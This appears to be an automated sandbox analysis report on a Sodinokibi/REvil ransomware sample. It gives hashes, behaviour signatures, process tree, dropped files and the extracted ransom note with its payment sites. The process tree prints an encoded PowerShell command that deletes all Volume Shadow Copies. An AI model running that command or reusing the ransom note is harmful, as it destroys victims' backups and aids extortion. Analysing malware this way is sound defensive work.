Analysis

  • max time kernel
    136s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05-05-2024 09:21

General

  • Target

    1701c19d9610ee4be543815bff908281_JaffaCakes118.exe

  • Size

    165KB

  • MD5

    1701c19d9610ee4be543815bff908281

  • SHA1

    44821ddb87e0260ee8ba368e08c75b0ad3232923

  • SHA256

    6af766a07ccc641da303ab30936ed32ad32bb4d7c983f3df45c4c52c036e9d20

  • SHA512

    6794cb5b710b5165dfb59a6dcecff7776dce69b452b82e51dd9d35ec951e15febe9d71ceedc7ea91845b0d6e8c4214e7c07935dd2c8dd6f5c372e35971eed5ae

  • SSDEEP

    3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/NabPos:lw02sJPi7O93N9s

Malware Config

Extracted

Path

C:\Users\06z3z-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 06z3z. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7936EA53BFDF7C92 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/7936EA53BFDF7C92 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Vd6U0zj/ez3reA4KxvGRQatacs+x13tebxexjiOdeZjkUbt3q/IVfYax6D6sySvu X3gVtnAmzKXbryXVe4hDQEPY/+DpU3Iyfp7r6UB1MRHwoKa+F58bBzEMho6ET5nj iNc1e1E6XwYg+T9OFbD807fac58cJfOSEXx38iJr6xnRCuOUuSR193SpDRgTJ51b UjIitjqSAIogwqcXIQGgjuFJ/mc4TViVHf7uC8U5iQ1ghvn6aVVUWLgOC9JQFDSO 5Ad4mayLPAsjGzJJNXMH+HtT6FyMAuLe4ztCYT0UV22d2JfqFD4GObSyOzNvoJdg WUxmokTl5Hd1S9Y86iwqy8RrPUaaX8vWAe3jr2BQyrN08kSowHnoDcw7XDNozU8c XVm+GW1l4pRluPhFbggA0xOddSrzRVLPxyphNvdggAN10moOMmbTQ8UZUQQzM++C LtMn0xpjpaxQl+jvE+1IJJhew1/Uy/phbQBvy7PCVfVL7m+hVVMo//kVZDlEeAcO nLLaJiw9qW9XQ5kP32HhlLAGJmPs7LMJENh971p4rnYgJvbhHaH2WoU07iBZzrAV I5l66bV1/ES8DyI/rTGjbiJ43f0ABNi8E0MWTqccfXB010wTCljlfffbl238qWFV Y5jwphgrqmUFxpkLHVGMnoAwT9KDy3LDgRwlf9RVnJnOSmrvOBm7n1xVgsHXcctH WtpQqd06s7Y/PC2lK9gweU8zxbxwb93ovQLrokW2lp3nigOTIJPpvnAoN0/Rvo9z ZUMEA2qxMI/IejPKq4P3WfnsDbd7QnBqR7vnh8ORjhhTh7/LtWYrdlFdngs9ziaU zJQJoyjs3X43V4owzYFxY//aDPVSW6NoeUE2l/yyRxk9wYXIpdRknNdUj+5oFD7W L3vTb6bpWFq6AhluBzFgwcWmI7XUoJJhXDYLztDC6m2vULLCSPpcOsH4BvrmxcVy yoCXnhAf2y6sa5m4W82/aqpQw8EpMPSdb0D4z12m6o91y/YE1MntZ+/2o7/8XPPs /lnI0tbw4Hlz0wztUktvVqr2ODyY/7BjJ3VcA5f2X/+pw1eAhe3LoribfNZjeGqP t+xJ6XIelwdbVDpYMsP9OzX24AZEk+zHNBm52CrAvRD0L5n+45OMYvl2CDKeWCUT DJT37Xk984X0jvdBa5E5gku1S/wWcZbMwFj/QtoebeMSXTTCq8zOqgjGayo/msd5 4CQfr3O4 Extension name: 06z3z ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7936EA53BFDF7C92

http://decryptor.top/7936EA53BFDF7C92

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1701c19d9610ee4be543815bff908281_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1701c19d9610ee4be543815bff908281_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2832
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2576
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2560

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\06z3z-readme.txt

      Filesize

      6KB

      MD5

      b02f5ccf48ed8a7bdef316c28f14bbd2

      SHA1

      7093b2ba96581a15ba9bda3f2389490c11e2780a

      SHA256

      81bf98a14d0d3dfe9ee3432c721e42db13bbab3bf45aef40dae1e1df5326fa4f

      SHA512

      c697341957b2c93e7fd6ddfadcf2d80808bdb83585dc0933c20c1a2a58042bfe262e48d8fc7f40e7fa3b25ca5944f1f24282f3267e9b7351c7b570fcd3401153

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\Local\Temp\Tar6E25.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      193KB

      MD5

      67b2c73603f72e8bed04dbc19732fb80

      SHA1

      6ccedd8bd95285d856899f7c670e2dadde3a5d54

      SHA256

      2be282b2abe6e66d3d7bfaf7290c2a1dba7736c04ceb9d1bcefc27b71eff1715

      SHA512

      aa29e891124a4a8ecde80109d2aad2511c04ad832f83e870bb63760eab324c08ba10842467e94efb3a780aae21084d60c872abadd9a37b408deaa7323a60468a

    • memory/2832-4-0x000007FEF5A2E000-0x000007FEF5A2F000-memory.dmp

      Filesize

      4KB

    • memory/2832-5-0x000000001B2A0000-0x000000001B582000-memory.dmp

      Filesize

      2.9MB

    • memory/2832-6-0x0000000002420000-0x0000000002428000-memory.dmp

      Filesize

      32KB

    • memory/2832-7-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-8-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-9-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-10-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-11-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

      Filesize

      9.6MB